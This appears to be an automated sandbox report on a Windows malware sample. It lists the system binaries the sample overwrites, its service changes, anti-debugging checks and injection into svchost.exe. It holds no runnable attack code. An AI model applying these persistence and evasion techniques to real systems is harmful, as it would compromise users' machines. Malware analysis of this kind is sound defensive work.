          Source: Binary string: wntdll.pdbUGP | source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb | source: LiuUGJK9vH.exe, 00000000.00000003.1466769088.0000000004250000.00000004.00001000.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000003.1472318667.0000000004250000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1751681677.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1749096738.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1793138117.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ALG.pdb | source: LiuUGJK9vH.exe, 00000000.00000003.1463706750.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: alg.exe.0.dr | Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: real checksum: 0x1fb4b should be: 0x19172d
          Source: armsvc.exe.0.dr | Static PE information: section name: .didat
          Source: alg.exe.0.dr | Static PE information: section name: .didat
          Source: LiuUGJK9vH.exe | Static PE information: section name: .reloc entropy: 7.938033667934618
          Source: AppVClient.exe.0.dr | Static PE information: section name: .reloc entropy: 7.94301967209562

          Persistence and Installation Behavior

          Source: C:\Windows\System32\AppVClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a49546759c90d829.bin
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | System file written: C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created (dropped file): C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created (dropped file): C:\Windows\System32\AppVClient.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created (dropped file): C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe | File created (dropped file): C:\Windows\System32\alg.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_02F7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_02F7CBD0
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe API/Special instruction interceptor: Address: BA520C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B7096E rdtsc 4_2_03B7096E
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-110178
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe API coverage: 5.1 %
          Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe TID: 2868 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\svchost.exe TID: 1996 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
          Source: AppVClient.exe, 00000008.00000003.1475204828.0000000000599000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000002.1481720566.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000008.00000003.1474643358.0000000000591000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachineI
          Source: LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, LiuUGJK9vH.exe, 00000000.00000002.1480829576.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe API call chain: ExitProcess graph end node graph_0-108733
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_00417D33 LdrLoadDll, 4_2_00417D33
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00473F09 BlockInput, 0_2_00473F09
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00435A7C
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h] 0_2_0056C594
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00BA54D8 mov eax, dword ptr fs:[00000030h] 0_2_00BA54D8
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00BA5478 mov eax, dword ptr fs:[00000030h] 0_2_00BA5478
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_00BA3E58 mov eax, dword ptr fs:[00000030h] 0_2_00BA3E58
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_02F51130 mov eax, dword ptr fs:[00000030h] 0_2_02F51130
          Source: C:\Users\user\Desktop\LiuUGJK9vH.exe Code function: 0_2_02F93F3D mov eax, dword ptr fs:[00000030h] 0_2_02F93F3D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B28397 mov eax, dword ptr fs:[00000030h] 4_2_03B28397
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2E388 mov eax, dword ptr fs:[00000030h] 4_2_03B2E388
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B5438F mov eax, dword ptr fs:[00000030h] 4_2_03B5438F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_03B4E3F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B663FF mov eax, dword ptr fs:[00000030h] 4_2_03B663FF
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B403E9 mov eax, dword ptr fs:[00000030h] 4_2_03B403E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] 4_2_03BDE3DB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 4_2_03BD43D4
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 4_2_03BEC3CD
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_03B3A3C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B383C0 mov eax, dword ptr fs:[00000030h] 4_2_03B383C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB63C0 mov eax, dword ptr fs:[00000030h] 4_2_03BB63C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C0634F mov eax, dword ptr fs:[00000030h] 4_2_03C0634F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 4_2_03B2C310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B50310 mov ecx, dword ptr fs:[00000030h] 4_2_03B50310
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B6A30B mov eax, dword ptr fs:[00000030h] 4_2_03B6A30B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD437C mov eax, dword ptr fs:[00000030h] 4_2_03BD437C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C08324 mov eax, dword ptr fs:[00000030h] 4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C08324 mov ecx, dword ptr fs:[00000030h] 4_2_03C08324
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB035C mov eax, dword ptr fs:[00000030h] 4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB035C mov ecx, dword ptr fs:[00000030h] 4_2_03BB035C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BFA352 mov eax, dword ptr fs:[00000030h] 4_2_03BFA352
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD8350 mov ecx, dword ptr fs:[00000030h] 4_2_03BD8350
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB2349 mov eax, dword ptr fs:[00000030h] 4_2_03BB2349
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B402A0 mov eax, dword ptr fs:[00000030h] 4_2_03B402A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C062D6 mov eax, dword ptr fs:[00000030h] 4_2_03C062D6
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 4_2_03BC62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B6E284 mov eax, dword ptr fs:[00000030h] 4_2_03B6E284
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB0283 mov eax, dword ptr fs:[00000030h] 4_2_03BB0283
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B402E1 mov eax, dword ptr fs:[00000030h] 4_2_03B402E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_03B3A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2823B mov eax, dword ptr fs:[00000030h] 4_2_03B2823B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C0625D mov eax, dword ptr fs:[00000030h] 4_2_03C0625D
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BE0274 mov eax, dword ptr fs:[00000030h] 4_2_03BE0274
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B34260 mov eax, dword ptr fs:[00000030h] 4_2_03B34260
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2826B mov eax, dword ptr fs:[00000030h] 4_2_03B2826B
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2A250 mov eax, dword ptr fs:[00000030h] 4_2_03B2A250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B36259 mov eax, dword ptr fs:[00000030h] 4_2_03B36259
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BEA250 mov eax, dword ptr fs:[00000030h] 4_2_03BEA250
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB8243 mov eax, dword ptr fs:[00000030h] 4_2_03BB8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB8243 mov ecx, dword ptr fs:[00000030h] 4_2_03BB8243
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB019F mov eax, dword ptr fs:[00000030h] 4_2_03BB019F
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2A197 mov eax, dword ptr fs:[00000030h] 4_2_03B2A197
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C061E5 mov eax, dword ptr fs:[00000030h] 4_2_03C061E5
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B70185 mov eax, dword ptr fs:[00000030h] 4_2_03B70185
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BEC188 mov eax, dword ptr fs:[00000030h] 4_2_03BEC188
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD4180 mov eax, dword ptr fs:[00000030h] 4_2_03BD4180
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B601F8 mov eax, dword ptr fs:[00000030h] 4_2_03B601F8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_03BAE1D0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 4_2_03BF61C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B60124 mov eax, dword ptr fs:[00000030h] 4_2_03B60124
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03C04164 mov eax, dword ptr fs:[00000030h] 4_2_03C04164
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDA118 mov ecx, dword ptr fs:[00000030h] 4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDA118 mov eax, dword ptr fs:[00000030h] 4_2_03BDA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BF0115 mov eax, dword ptr fs:[00000030h] 4_2_03BF0115
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDE10E mov eax, dword ptr fs:[00000030h] 4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BDE10E mov ecx, dword ptr fs:[00000030h] 4_2_03BDE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2C156 mov eax, dword ptr fs:[00000030h] 4_2_03B2C156
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC8158 mov eax, dword ptr fs:[00000030h] 4_2_03BC8158
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B36154 mov eax, dword ptr fs:[00000030h] 4_2_03B36154
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC4144 mov eax, dword ptr fs:[00000030h] 4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC4144 mov ecx, dword ptr fs:[00000030h] 4_2_03BC4144
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BF60B8 mov eax, dword ptr fs:[00000030h] 4_2_03BF60B8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BF60B8 mov ecx, dword ptr fs:[00000030h] 4_2_03BF60B8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B280A0 mov eax, dword ptr fs:[00000030h] 4_2_03B280A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC80A8 mov eax, dword ptr fs:[00000030h] 4_2_03BC80A8
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B3208A mov eax, dword ptr fs:[00000030h] 4_2_03B3208A
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2C0F0 mov eax, dword ptr fs:[00000030h] 4_2_03B2C0F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B720F0 mov ecx, dword ptr fs:[00000030h] 4_2_03B720F0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_03B2A0E3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B380E9 mov eax, dword ptr fs:[00000030h] 4_2_03B380E9
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB60E0 mov eax, dword ptr fs:[00000030h] 4_2_03BB60E0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB20DE mov eax, dword ptr fs:[00000030h] 4_2_03BB20DE
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BC6030 mov eax, dword ptr fs:[00000030h] 4_2_03BC6030
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2A020 mov eax, dword ptr fs:[00000030h] 4_2_03B2A020
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B2C020 mov eax, dword ptr fs:[00000030h] 4_2_03B2C020
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B4E016 mov eax, dword ptr fs:[00000030h] 4_2_03B4E016
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB4000 mov ecx, dword ptr fs:[00000030h] 4_2_03BB4000
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD2000 mov eax, dword ptr fs:[00000030h] 4_2_03BD2000
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B5C073 mov eax, dword ptr fs:[00000030h] 4_2_03B5C073
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B32050 mov eax, dword ptr fs:[00000030h] 4_2_03B32050
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB6050 mov eax, dword ptr fs:[00000030h] 4_2_03BB6050
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B307AF mov eax, dword ptr fs:[00000030h] 4_2_03B307AF
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BE47A0 mov eax, dword ptr fs:[00000030h] 4_2_03BE47A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BD678E mov eax, dword ptr fs:[00000030h] 4_2_03BD678E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B347FB mov eax, dword ptr fs:[00000030h] 4_2_03B347FB
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B527ED mov eax, dword ptr fs:[00000030h] 4_2_03B527ED
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BBE7E1 mov eax, dword ptr fs:[00000030h] 4_2_03BBE7E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B3C7C0 mov eax, dword ptr fs:[00000030h] 4_2_03B3C7C0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03BB07C3 mov eax, dword ptr fs:[00000030h] 4_2_03BB07C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B6273C mov eax, dword ptr fs:[00000030h] 4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03B6273C mov ecx, dword ptr fs:[00000030h] 4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6273C mov eax, dword ptr fs:[00000030h]4_2_03B6273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAC730 mov eax, dword ptr fs:[00000030h]4_2_03BAC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C720 mov eax, dword ptr fs:[00000030h]4_2_03B6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C720 mov eax, dword ptr fs:[00000030h]4_2_03B6C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30710 mov eax, dword ptr fs:[00000030h]4_2_03B30710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B60710 mov eax, dword ptr fs:[00000030h]4_2_03B60710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C700 mov eax, dword ptr fs:[00000030h]4_2_03B6C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B38770 mov eax, dword ptr fs:[00000030h]4_2_03B38770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B40770 mov eax, dword ptr fs:[00000030h]4_2_03B40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B30750 mov eax, dword ptr fs:[00000030h]4_2_03B30750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BBE75D mov eax, dword ptr fs:[00000030h]4_2_03BBE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72750 mov eax, dword ptr fs:[00000030h]4_2_03B72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B72750 mov eax, dword ptr fs:[00000030h]4_2_03B72750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BB4755 mov eax, dword ptr fs:[00000030h]4_2_03BB4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov esi, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov eax, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6674D mov eax, dword ptr fs:[00000030h]4_2_03B6674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B666B0 mov eax, dword ptr fs:[00000030h]4_2_03B666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]4_2_03B6C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34690 mov eax, dword ptr fs:[00000030h]4_2_03B34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03B34690 mov eax, dword ptr fs:[00000030h]4_2_03B34690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]4_2_03BAE6F2
